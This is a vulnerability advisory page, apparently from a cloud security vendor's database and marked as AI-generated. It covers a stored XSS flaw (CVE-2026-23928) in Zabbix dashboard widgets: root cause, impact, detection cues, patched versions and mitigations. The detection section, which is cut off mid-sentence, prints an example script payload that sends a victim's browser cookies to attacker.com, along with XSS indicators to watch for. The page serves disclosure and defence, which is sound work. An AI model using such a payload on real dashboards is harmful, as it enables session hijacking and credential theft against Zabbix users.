
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-23928 is a stored Cross-Site Scripting (XSS) vulnerability in Zabbix's Item history widget (Zabbix 7.0+) and Plain text widget (Zabbix 6.0) that allows injected JavaScript to execute when HTML display is enabled. An attacker controlling a monitored host can inject malicious JavaScript payloads that are stored and later executed in the browser of any user who opens a dashboard containing these widgets. Affected versions include Zabbix 6.0.0–6.0.44, 7.0.0–7.0.23, and 7.4.0–7.4.7. The vulnerability was published on May 6, 2026, with a CVSS v4.0 base score of 7.3 (High) (Zabbix Bug Tracker, GitHub Advisory).
The root cause is improper neutralization of user-controllable input before it is rendered in a web page (CWE-79 — Stored XSS). When the Item history or Plain text widget is configured with HTML display enabled, data values submitted by monitored hosts are rendered as raw HTML/JavaScript in the Zabbix frontend without adequate sanitization. An attacker who controls a monitored host can send crafted metric values containing JavaScript payloads; these are stored in the Zabbix database and executed in the victim's browser when they view the affected dashboard widget. Exploitation requires the attacker to have control over a monitored host (a deployment-specific precondition) and a privileged user to passively view the dashboard (Zabbix Bug Tracker, GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any Zabbix user who opens a dashboard containing the vulnerable widget, potentially including administrators. This can result in session hijacking, credential theft, unauthorized configuration changes, or other actions performed on behalf of the victim user — all with the victim's privilege level. The confidentiality, integrity, and availability of the vulnerable Zabbix system are all rated High impact under CVSS v4.0, though subsequent (downstream) systems are not directly impacted (Zabbix Bug Tracker, GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) via the Zabbix agent or passive check mechanism.<script>, javascript:, or HTML event handlers) submitted by monitored hosts; web server access logs showing requests to external domains initiated from the Zabbix web UI.Zabbix has released patched versions: 6.0.45, 7.0.24, and 7.4.8, which address this vulnerability (Zabbix Bug Tracker). Organizations unable to upgrade immediately should disable HTML display in the Item history widget (Zabbix 7.0+) or Plain text widget (Zabbix 6.0), or disable these widgets entirely via Administration → General → Modules. Additionally, restricting which hosts can be monitored and ensuring only trusted sources provide monitored data reduces the attack surface.
The vulnerability was reported by Janis Nulle and assigned to the Zabbix Support Team, with the issue resolved on the same day it was created (May 6, 2026) (Zabbix Bug Tracker). Red Hat tracked the issue via Bugzilla (Bug 2466965) with a medium severity rating (Red Hat Bugzilla). The vulnerability received coverage in weekly threat landscape digests but has not generated significant broader community or media discussion, consistent with its moderate severity and limited exploitability preconditions.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."